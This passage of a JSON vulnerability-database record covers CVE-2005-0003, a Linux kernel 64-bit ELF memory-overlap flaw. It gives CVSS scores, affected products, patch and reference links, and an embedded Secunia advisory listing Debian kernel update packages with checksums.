                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "This discoverer of this vulnerability is currently unknown.",
    "sources": [
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2005-0003",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 2.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2005-0003",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-11212",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2005-0003",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200504-057",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-11212",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The 64 bit ELF support in Linux kernel 2.6 before 2.6.10, on 64-bit architectures, does not properly check for overlapping VMA (virtual memory address) allocations, which allows local users to cause a denial of service (system crash) or execute arbitrary code via a crafted ELF or a.out file. Linux Kernel is reported prone to a local denial-of-service vulnerability. \nReportedly, this issue presents itself when a user creates a large Virtual Memory Area (VMA) that overlaps with arg pages during the exec() system call. \nSuccessful exploitation will lead to a denial-of-service condition in a vulnerable computer. \nNo further details are available at this time. This issue will be updated as more information becomes available. Linux Kernel is the kernel of the open source operating system Linux. \n\n----------------------------------------------------------------------\n\nWant to join the Secunia Security Team?\n\nSecunia offers a position as a security specialist, where your daily\nwork involves reverse engineering of software and exploit code,\nauditing of source code, and analysis of vulnerability reports. \n\nhttp://secunia.com/secunia_security_specialist/\n\n----------------------------------------------------------------------\n\nTITLE:\nDebian update for kernel-source-2.4.17\n\nSECUNIA ADVISORY ID:\nSA20338\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/20338/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nExposure of system information, Exposure of sensitive information,\nPrivilege escalation, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nDebian GNU/Linux 3.0\nhttp://secunia.com/product/143/\n\nDESCRIPTION:\nDebian has issued an update for kernel-source-2.4.17. This fixes some\nvulnerabilities, which can be exploited by malicious, local users to\ngain knowledge of sensitive information, cause a DoS (Denial of\nService), gain escalated privileges, and by malicious people to cause\na DoS, and disclose potentially sensitive information. \n\n-- Debian GNU/Linux 3.0 alias woody --\n\nSource archives:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc\nSize/MD5 checksum: 713 6ff55b14d3ae957c55bbed7fabf4c047\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz\nSize/MD5 checksum: 30437486 86601103169da686167972e5e560e3d4\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc\nSize/MD5 checksum: 736 f97d95c6ecc26401f8f2fc2ead6cf421\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz\nSize/MD5 checksum: 25419305 9bc354f889edd4964840475400b088b7\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc\nSize/MD5 checksum: 800 d20db4ab99e311150734b70519cc31e9\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz\nSize/MD5 checksum: 12283 f51a7e01941baca7010fb8c2f0f67fe3\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc\nSize/MD5 checksum: 694 2d48f4cfa4917904b6c1f806ecc1bdb4\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz\nSize/MD5 checksum: 491935 94638c0c03b6b163f46319e777d4aa71\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc\nSize/MD5 checksum: 805 b48cbc9c2cd59eee3a52f54cfa5356e0\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz\nSize/MD5 checksum: 1150966 6748462e7bce7c917e066e0594d42571\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc\nSize/MD5 checksum: 664 f49e9cba55a8a4b098e5dc522f2a07fc\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz\nSize/MD5 checksum: 344642 3a488cc38ffc619bfff4bfbb75eff4cd\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc\nSize/MD5 checksum: 609 4e0f66c1811cfb9e926c21566e55b202\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz\nSize/MD5 checksum: 29768549 bc1f8eab880a33bfe2ebeb3ef8b6557a\n\nArchitecture independent components:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb\nSize/MD5 checksum: 24455128 ed5362b12c6327295cd89027ff8e80ab\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb\nSize/MD5 checksum: 24735538 cf9ddb702811464ac2dd2231512053f9\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb\nSize/MD5 checksum: 1151866 6f2575f26e7800e1e7a7cafdaf02b3a6\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb\nSize/MD5 checksum: 300202 0f5db53cdab20024b4a3a75bd0799b1a\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb\nSize/MD5 checksum: 1708122 7d18878351662289ac0841e0ad8f10f4\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb\nSize/MD5 checksum: 23972270 a0bf4a2796a9b49c36579166e6a72d62\n\nHP Precision architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb\nSize/MD5 checksum: 3523044 63c790a70164e579c8bb3b8a08ea69b5\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb\nSize/MD5 checksum: 2869994 e9e2be22d5fdf40f2e879570adc1132d\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb\nSize/MD5 checksum: 3006192 cf53ac718c6ed26a59802e74c5926f00\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb\nSize/MD5 checksum: 3029436 d0e0fd747af9ff7a3633ee9cc6b1f1e6\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb\nSize/MD5 checksum: 3170356 ca408698a580463da3a547b2f87006e4\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb\nSize/MD5 checksum: 16886 437018078d9d01e25702cf1a20c23414\n\nIntel IA-64 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb\nSize/MD5 checksum: 3638280 b6cd4e0d4129b6f4d0734253818cd828\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb\nSize/MD5 checksum: 7026800 55e4cd610c06297c7132ce2aeb88d029\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb\nSize/MD5 checksum: 7172892 a66f94c18d8ee4354e9446655837c72a\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb\nSize/MD5 checksum: 7014470 d99cc0f293c747a295230de934328007\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb\nSize/MD5 checksum: 7165570 997a9dbf17821067de6ceb65548e7c2b\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb\nSize/MD5 checksum: 21616 1eab80187061fbd304b6328533d7dc33\n\nIBM S/390 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb\nSize/MD5 checksum: 3379418 74817217abf90896eb63d6c6792839fe\nhttp://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb\nSize/MD5 checksum: 1346190 39433c757763336b6c14bf0d00652596\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb\nSize/MD5 checksum: 16404 9cfcf10a2a2ef99bbb009a650cddd227\n\nPowerPC architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 3409712 698750e3998ee3792db43f445a8a8d96\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 2211146 103890e43508a5913a10ff8be80e9cdc\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 4602 31ef3f45675fc13836337dee97486e20\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb\nSize/MD5 checksum: 490842 799441a4e49b88f780353d7aff9f29d2\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb\nSize/MD5 checksum: 16280 4e54c040bc83523d8122287bab6df7a5\n\nBig endian MIPS architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 3523520 45f001c255a3a66f22148d84d035abb1\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 2045436 c840c6ff8c9e3ab455d38021d09a391d\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb\nSize/MD5 checksum: 2045226 709ccbc6754644fa448c93058f0df504\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb\nSize/MD5 checksum: 16556 019623b1dbc75bff84d7f056435dc6db\n\nLittle endian MIPS architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 3522422 2118440d1658730fd93f47867848573c\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 2200968 63bc732deee6df19b83f10a50485a476\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 2195278 697eb9b05f765c332eca175284eb24b8\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb\nSize/MD5 checksum: 17836 61df1f292dccb4e64cb956a629f729fc\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb\nSize/MD5 checksum: 16558 f8382b01aca2c535988b5ab5709dae90\n\nAlpha architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb\nSize/MD5 checksum: 17180 7d1cf8fb24431c01f45fadf7becb6d2e\n\nARM architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb\nSize/MD5 checksum: 15878 fcf97ed103c205699fb5396c3a49e293\n\nIntel IA-32 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb\nSize/MD5 checksum: 15518 2e7d50090a469a84ef7f3ae8aa97b85f\n\nMotorola 680x0 architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb\nSize/MD5 checksum: 15368 41a11620bf7ea34b15742ccf59ff6895\n\nSun Sparc architecture:\n\nhttp://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb\nSize/MD5 checksum: 18356 71b076d3eeff837bfb54a7f538b11b58\n\nORIGINAL ADVISORY:\nhttp://www.us.debian.org/security/2006/dsa-1082\n\nOTHER REFERENCES:\nSA10533:\nhttp://secunia.com/advisories/10533/\n\nSA11464:\nhttp://secunia.com/advisories/11464/\n\nSA11861:\nhttp://secunia.com/advisories/11861/\n\nSA11943:\nhttp://secunia.com/advisories/11943/\n\nSA13232:\nhttp://secunia.com/advisories/13232/\n\nSA13469:\nhttp://secunia.com/advisories/13469/\n\nSA13126:\nhttp://secunia.com/advisories/13126/\n\nSA13308:\nhttp://secunia.com/advisories/13308/\n\nSA13627:\nhttp://secunia.com/advisories/13627/\n\nSA13756:\nhttp://secunia.com/advisories/13756/\n\nSA13493:\nhttp://secunia.com/advisories/13493/\n\nSA13822:\nhttp://secunia.com/advisories/13822/\n\nSA14295:\nhttp://secunia.com/advisories/14295/\n\nSA14570:\nhttp://secunia.com/advisories/14570/\n\nSA13784:\nhttp://secunia.com/advisories/13784/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2005-0003",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "12261",
        "trust": 2.8
      },
      {
        "db": "SECTRACK",
        "id": "1012885",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "20202",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "20338",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "20163",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057",
        "trust": 0.7
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:043",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2005:017",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1069",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1067",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1070",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1082",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2005:022",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2005:018",
        "trust": 0.6
      },
      {
        "db": "TRUSTIX",
        "id": "2005-0001",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "18886",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-11212",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46873",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46534",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46587",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "id": "VAR-200501-0468",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:24:20.836000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "RHSA-2005:017",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-017.html"
      },
      {
        "title": "RHSA-2005:043",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2005-043.html"
      },
      {
        "title": "TLSA-2005-29",
        "trust": 0.8,
        "url": "http://www.turbolinux.com/security/2005/tlsa-2005-29.txt"
      },
      {
        "title": "RHSA-2005:017",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-017j.html"
      },
      {
        "title": "RHSA-2005:043",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2005-043j.html"
      },
      {
        "title": "TLSA-2005-29",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2005/tlsa-2005-29j.txt"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/12261"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1067"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2005:022"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-017.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2005-043.html"
      },
      {
        "trust": 1.7,
        "url": "http://securitytracker.com/id?1012885"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20163"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20202"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20338"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2005_18_kernel.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.trustix.org/errata/2005/0001/"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9512"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18886"
      },
      {
        "trust": 1.0,
        "url": "http://linux.bkbits.net:8080/linux-2.4/cset%4041c36fb6q1z68wuzkqfjjr-40ev3tw"
      },
      {
        "trust": 1.0,
        "url": "http://linux.bkbits.net:8080/linux-2.6/cset%4041a6721cce-lopqkzkxudyby_3tumg"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-0003"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-0003"
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2005/jan/1012885.html"
      },
      {
        "trust": 0.7,
        "url": "http://linux.bkbits.net:8080/linux-2.4/cset@41c36fb6q1z68wuzkqfjjr-40ev3tw"
      },
      {
        "trust": 0.7,
        "url": "http://linux.bkbits.net:8080/linux-2.6/cset@41a6721cce-lopqkzkxudyby_3tumg"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/18886"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2005-034_rhsa-2005-016rhsa-2006-017rhsa-2005-043.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2005-043.html"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13232/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13469/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13308/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/11464/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13822/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/product/143/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/10533/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13756/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13126/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/11943/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13627/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13493/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/14570/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/11861/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/13784/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/advisories/14295/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-source-2.4.17-hppa_32.5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc"
      },
      {
        "trust": 0.1,
